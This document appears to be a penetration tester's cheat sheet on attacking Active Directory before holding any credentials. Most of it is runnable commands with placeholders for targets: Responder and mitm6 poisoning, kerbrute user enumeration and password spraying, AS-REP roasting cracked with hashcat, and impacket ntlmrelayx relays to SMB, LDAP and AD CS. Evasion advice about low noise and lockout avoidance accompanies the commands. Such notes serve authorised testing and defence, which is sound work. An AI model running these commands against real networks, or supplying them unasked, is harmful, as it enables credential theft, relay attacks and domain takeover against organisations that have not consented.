Pre-Authentication Attacks (No Credentials)
Everything in this section is possible with only network access and no valid domain credentials.
This phase is about:
- identifying valid users
- finding weak authentication paths
- forcing or harvesting authentication
- setting up relay opportunities
I want to leave this phase with something reusable:
a password, a hash, a ticket, or a confirmed misconfiguration.
Mental Checklist
Before touching anything:
- Can I enumerate users without auth?
- Is name resolution trusted?
- Is Kerberos configured properly?
- Is NTLM in use?
- Are there relayable services?
Name Resolution Poisoning (LLMNR / NBT-NS / mDNS)
If legacy name resolution is enabled, I can poison requests and force authentication.
Common Tools
responderinveigh(Windows)impacket-ntlmrelayx
Basic Responder
1 | responder -I eth0 -dwPv |
What I Watch For
- Incoming NTLM authentication
- Machine accounts authenticating automatically
- Service accounts leaking creds
Captured output:
- NTLMv2 hashes
- Cleartext (rare, but happens)
- Relayable authentication
IPv6 Abuse (mitm6 / DHCPv6)
If IPv6 is enabled but unmanaged, this often works instantly.
Basic mitm6 Setup
1 | mitm6 -i eth0 -d <domain> |
Pair With NTLM Relay
1 | impacket-ntlmrelayx -6 -t ldap://<DC_IP> -wh fakewpad.<domain> |
Possible outcomes:
- LDAP relay
- AD CS enrollment
- Group modification
- Shadow credentials
Kerberos User Enumeration
Kerberos tells you if a user exists.
Kerbrute (Username Enumeration)
1 | kerbrute userenum -d <domain> --dc <DC_IP> users.txt |
Results:
- Valid users
- Disabled accounts
- Accounts requiring pre-auth
This saves me from blind spraying later.
Password Spraying (Pre-Auth)
This is controlled and slow.
Kerberos Spray (Safe)
1 | kerbrute passwordspray -d <domain> --dc <DC_IP> users.txt 'Password123!' |
NTLM Spray (SMB)
1 | nxc smb <DC_IP> -u users.txt -p 'Password123!' --no-bruteforce |
Rules I follow:
- One password per round
- Respect lockout policy
- Wait between sprays
AS-REP Roasting (No Preauth)
Accounts with pre-auth disabled leak crackable material.
Identify & Request AS-REP
1 | GetNPUsers.py <domain>/ -dc-ip <DC_IP> -no-pass |
With known users:
1 | GetNPUsers.py <domain>/ -dc-ip <DC_IP> -usersfile users.txt -no-pass |
Crack Offline
1 | hashcat -m 18200 asrep.hash rockyou.txt |
This is high-value and very low-noise.
NTLM Relay (Pre-Auth Context)
Relay turns authentication into access.
SMB Relay (Signing Disabled)
1 | impacket-ntlmrelayx -t smb://<TARGET> |
LDAP Relay
1 | impacket-ntlmrelayx -t ldap://<DC_IP> |
AD CS Relay
1 | impacket-ntlmrelayx -t https://<CA_SERVER>/certsrv/certfnsh.asp |
Relay paths define what escalation options I’ll have later.
Quick Pre-Auth Flow I Actually Use
- Kerberos user enum
- AS-REP roasting
- Password spray (carefully)
- Poisoning (Responder / mitm6)
- Relay testing
I stop early if I get a valid credential.
Common Pitfalls
- Spraying too aggressively
- Ignoring lockout policy
- Capturing hashes without checking relay paths
- Running Responder blindly in monitored networks
Notes to Self
- Pre-auth is about leverage, not speed
- If this phase is locked down, the domain is usually hardened elsewhere
- One clean credential beats 100 noisy attempts
Next: Authenticated Enumeration




